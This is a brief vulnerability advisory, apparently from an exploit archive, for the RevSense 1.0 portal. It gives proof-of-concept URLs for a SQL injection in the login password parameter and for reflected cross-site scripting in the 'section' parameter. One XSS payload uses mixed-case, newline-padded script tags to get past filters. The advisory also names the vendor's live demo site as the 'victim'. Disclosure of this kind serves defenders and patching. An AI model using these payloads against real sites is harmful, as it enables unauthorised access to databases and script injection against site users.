RevSense version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
03be40a5a6fc37d830d0c2601d09292606406b6e0b4bc4aa702ec04113d24d40
#########################################################
---------------------------------------------------------
Portal Name : RevSense
Version : 1.0
Vendor : http://www.revsense.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/?f%5Bemail%5D=test@mail.com&f%5Bpassword%5D=\"§ion=user&action=login
[XSS]:
http://site.com/?section=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&action=login&t=Pouya
http://site.com/index.php?section=<script>alert(1369)</script>&action=login
---------------------------------
Victem :
http://demo.revsense.com